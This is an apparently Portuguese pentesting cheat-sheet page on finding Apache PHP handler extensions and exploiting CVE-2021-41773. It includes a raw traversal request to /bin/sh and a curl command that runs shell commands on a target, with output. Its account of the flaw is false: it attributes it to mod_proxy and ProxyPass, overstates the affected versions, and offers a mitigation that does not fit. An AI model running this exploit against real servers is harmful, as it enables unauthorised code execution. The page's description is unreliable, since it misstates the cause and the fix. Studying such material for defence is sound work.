# Extensões PHP executáveis Verifique quais extensões estão sendo executadas pelo servidor Apache. Para procurá-las, você pode executar: ```bash grep -R -B1 "httpd-php" /etc/apache2 ``` Também é possível encontrar essa configuração em: ```bash /etc/apache2/mods-available/php5.conf /etc/apache2/mods-enabled/php5.conf /etc/apache2/mods-available/php7.3.conf /etc/apache2/mods-enabled/php7.3.conf ``` # CVE-2021-41773 ## Descrição O CVE-2021-41773 é uma vulnerabilidade de execução de código remoto no Apache HTTP Server. Essa vulnerabilidade permite que um invasor execute código malicioso no servidor alvo sem autenticação. ## Detalhes A vulnerabilidade está presente em todas as versões do Apache HTTP Server 2.4 anteriores à 2.4.50 e é causada por uma falha na diretiva "mod_proxy" do servidor. Essa diretiva é usada para configurar o módulo de proxy do Apache, que permite que o servidor atue como um proxy reverso para outros servidores. A falha ocorre quando a diretiva "ProxyPass" é usada com um valor de URL malformado. Um invasor pode explorar essa falha enviando uma solicitação HTTP GET ou HEAD para o servidor alvo com um valor de URL malformado na solicitação. Isso pode levar à execução de código malicioso no servidor alvo. ## Exploração Para explorar essa vulnerabilidade, um invasor pode enviar uma solicitação HTTP GET ou HEAD para o servidor alvo com um valor de URL malformado na solicitação. O valor de URL malformado deve incluir a sequência "%2e" (que representa o caractere "." na codificação URL) duas vezes seguidas. Por exemplo, a seguinte solicitação HTTP GET pode ser usada para explorar a vulnerabilidade: ``` GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 Host: example.com ``` Essa solicitação usa a sequência "%2e" para navegar para o diretório pai do diretório raiz do servidor e, em seguida, para o diretório "/bin/sh", que contém o shell do sistema. Isso pode levar à execução de código malicioso no servidor alvo. ## Mitigação A vulnerabilidade pode ser corrigida atualizando o Apache HTTP Server para a versão 2.4.50 ou posterior. Além disso, os administradores do servidor podem restringir o acesso ao módulo de proxy do Apache usando a diretiva "Require" para permitir apenas solicitações de hosts confiáveis. ```bash curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname' uid=1(daemon) gid=1(daemon) groups=1(daemon) Linux ```
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 - Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! - Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) - Adquira [**produtos oficiais PEASS & HackTricks**](https://peass.creator-spring.com) - **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** - **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.